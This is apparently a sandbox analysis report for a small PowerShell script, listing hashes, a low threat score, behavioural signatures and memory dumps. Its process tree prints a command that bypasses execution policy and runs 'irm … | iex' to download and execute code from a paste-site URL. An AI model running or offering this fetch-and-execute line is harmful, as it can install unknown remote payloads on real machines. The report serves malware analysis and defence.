Overview

overview

10

Static

static

1

script.ps1

windows7-x64

3

script.ps1

windows10-2004-x64

10

Analysis

  • max time kernel
    119s
  • max time network
    120s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    08/03/2025, 17:47

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    script.ps1

  • Size

    50B

  • MD5

    f7907aaa36ecbdf6ea474650bea2b747

  • SHA1

    11356251ecc1dca11f6e372197d4d757dd6eb43d

  • SHA256

    30d852a6064a9f9e57981364edbee0c7a1fecc1d9681bb2a9255e3b13da0c67f

  • SHA512

    8c61c47b5d20e41147bbe3c737cf033bf00392e6dd69f8fab6dca4f54170378fef7233dccf7d8c1eabc322240e920168ed9920af0a3a83a1d13d212eff82b25e

Score
3/10
execution

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Using powershell.exe command.

    execution
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 3 IoCs

Processes

  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\script.ps1
    1⤵
    • Command and Scripting Interpreter: PowerShell
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2744
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "irm https://paste.ee/d/linhgh7d | iex"
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1740

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
    Filesize

    7KB

    MD5

    59777d044bc16ad011ec9d20ab12d2db

    SHA1

    0432be4862a7be9741a2cd31a040e56116fad500

    SHA256

    e68108349db2929746f900539863e9cc0a6347a75e3928ae971809c50c859613

    SHA512

    7acd39510b5bd8d58372e3d3a4758145d3f046022a3e5e3123049ec263d218b4f3125cf14abb3dd8d59b284900565a915f373a7c673feade4feb89b491e48a18

    Download Submit

  • memory/1740-16-0x000007FEF6240000-0x000007FEF6BDD000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/1740-17-0x000007FEF6240000-0x000007FEF6BDD000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2744-4-0x000007FEF64FE000-0x000007FEF64FF000-memory.dmp

    Filesize

    4KB

    Download

  • memory/2744-5-0x000000001B680000-0x000000001B962000-memory.dmp

    Filesize

    2.9MB

    Download

  • memory/2744-6-0x00000000028E0000-0x00000000028E8000-memory.dmp

    Filesize

    32KB

    Download

  • memory/2744-7-0x000007FEF6240000-0x000007FEF6BDD000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2744-8-0x000007FEF6240000-0x000007FEF6BDD000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2744-9-0x000007FEF6240000-0x000007FEF6BDD000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2744-10-0x000007FEF6240000-0x000007FEF6BDD000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2744-18-0x000007FEF6240000-0x000007FEF6BDD000-memory.dmp

    Filesize

    9.6MB

    Download